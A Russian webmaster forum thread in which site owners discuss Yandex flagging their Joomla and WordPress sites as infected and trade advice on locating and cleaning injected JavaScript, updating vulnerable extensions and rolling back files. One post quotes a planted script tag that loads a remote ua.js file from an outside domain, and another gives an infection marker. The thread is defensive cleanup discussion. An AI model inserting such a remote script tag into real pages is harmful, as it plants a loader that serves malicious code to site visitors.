- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
ТС обычно яндекс ставит метку правильно, внешний вирус можете не увидеть, например он может показываться раз в сутки, проверьте шаблон корневые файлы сайта.
Если сами не справитесь стучите проверим сайт на вирусы + дадим рекомендации!
я ж там написал, что не вирус (да и по версии яндекса не вирус)- там накрутка поведенческих...
Не знаю зачем она поиск по сайту ввиде ссылки оформила- получается что по ее сайту с этой страници всегда ищут люди одну и ту-же фразу
самый простой способ добавить сайт в гугле панель вебмастера
и все вредоносные коды вы увидеть как на ладони
У меня такая же штука была. Очень успешно использовал Kaspersky Virus Removal Tool. Определил всю грязь и вычистил ее. Рекомендую. К тому же это бесплатно.
Сайт на Джумле? У вас скорее всего заражены .js файлы на хостинге через дыру :) Ну а дальше дело техники подгружать iframe.
Вот еще одна хрень, за которую Я звездочку ставит
<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script><script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>
Находится обычно wp-includes/functions.php и в header.php
Как бороться? Шеллов нигдеинет, хостинги разные. Приходится с айболитом вместе сидеть, но он много не видит. Как он прописывает этот скрипт, если права 444 стоят??
http://viju.tvercity.net/ru/weblog/removing-mallware-5-apr-2012
Читаем.
Долго не копался - но я так понял - что подобран пароль по фтп у вас и заменен код в js скрипте. Отсюда и ваши 444 не играют роль.
В таком случае - переписан был индексный файн php - и вместо сайта у вас редирект бы стоял на что нить hacked by... Если такого нет - нужно просмотреть index.php - если он по умолчанию - и проверить строки с началом на echo - а дальше в коде ссылка на какой нить сайт. http://*** (этот код вызывал был js скрипт с другого сайта, который бы и приводил в действие вышеупомянутый iframe) - просто тупо ее удалить.
Посмотрите последние даты изменения файлов сайта (php, js)- если даты недавние и в одно и тоже время - сделайте через хостинг-провайдера откат на дату раньше. Базу Mysql можно скопировать на состояние сегодняшнего дня. Потом по восстановлению файлов CMS - восстановить все данные уже на рабочий движок.
Скорее всего и htaccess заражен и скрипт стоит, который эту заразу будет постоянно распространять... Ищите кого-то, кто почистит сайт... У меня такое было сразу на 10 сайтов... За 100 долларов мне почистили...
На прошлой неделе Яндекс стал кричать что обнаружен вирус на одной из страниц моего сайта с вердиктом - поведенческий анализ:
http://haircolor.org.ua/texniki/item/145-okrashivanie-ombre.html
Это наиболее посещаемая страница из второстепенных. Посещаемость естественно упала с яши. Я проверила код и не нашла вроде ничего нового. Но я php и html знаю не очень.
Сделала проверку сайта на antivirus-alarm.ru
В результатах обнаружено только: VIPRE Malware.JS.Generic (JS). Все остальные базы молчат.
http://antivirus-alarm.ru/proverka/?url=haircolor.org.ua%2Ftexniki%2Fitem%2F145-okrashivanie-ombre.html
Проверка через http://2ip.ru/site-virus-scaner/ показывает подозрение на вирус из-за фрем вставки. Единственный фрейм который я обнаружила в коде - это фрейм плеера, который воспроизводить видео с ютуб. Что вирусом не является.
Заказала повторную проверку в яндексе. Она через 2 дня сняла информацию о вирусе, но стона через 3 дня она появилась. С той же страницей.
С гуглом все в порядке, а вот с Яшей что делать не знаю.
Подскажите в чем может быть проблема и как ее решить?
Добро пожаловать на борт: http://joomlaforum.ru/index.php/topic,258717.0.html
Вкратце. У Вас на сайте вредоносный код в js файлах. Легко найти по ключу: /*214afaae*/. Код постоянно меняется, может сам исчезать, потом появляться снова, но эта метка постоянная. Удалив все закладки кода, Вы на какое-то время избавитесь от метки Яндекса, но не от вируса. Сам код вируса где-то в php файле. Заливают предположительно через старые версии JCE и NoNamber. Их нужно обновить до актуальных. Там тема с пометкой "решено", хотя проблема не решена.
Да, и проверяйте все сайты на аккаунте, если их несколько. Зараза расползается по всем папакам на хостинге.
Добро пожаловать на борт: http://joomlaforum.ru/index.php/topic,258717.0.html
Вкратце. У Вас на сайте вредоносный код в js файлах. Легко найти по ключу: /*214afaae*/. Код постоянно меняется, может сам исчезать, потом появляться снова, но эта метка постоянная. Удалив все закладки кода, Вы на какое-то время избавитесь от метки Яндекса, но не от вируса. Сам код вируса где-то в php файле. Заливают предположительно через старые версии JCE и NoNamber. Их нужно обновить до актуальных. Там тема с пометкой "решено", хотя проблема не решена.
Да, и проверяйте все сайты на аккаунте, если их несколько. Зараза расползается по всем папакам на хостинге.
Аналогично были заражены все сайты на аккаунте. Вроде победил заразу. Вначале грохнул вышеупомянутые плагины/модули. Айболитом выявил все подозрительные файлы по типу 87328a.php, удалил. И затем скриптом far.php вычистил все js файлы от вредоносного кода
и не забыть обновить модули/CMS до последней версии